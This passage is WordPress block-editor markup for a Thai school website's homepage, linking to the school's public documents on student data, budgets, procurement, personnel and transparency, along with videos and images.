data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5} -->\n<h5 class=\"wp-block-heading has-text-align-center\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5,\"align\":\"full\"} -->\n<h5 class=\"wp-block-heading alignfull has-text-align-center\"><a href=\"https://drive.google.com/file/d/1q0z8a2Mbu3x-c8vLwrElwX6v8BJY7jtB/view?usp=sharing\">แผนพัฒนาการจัดการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3298cf22\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"ea4e4ab8\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" 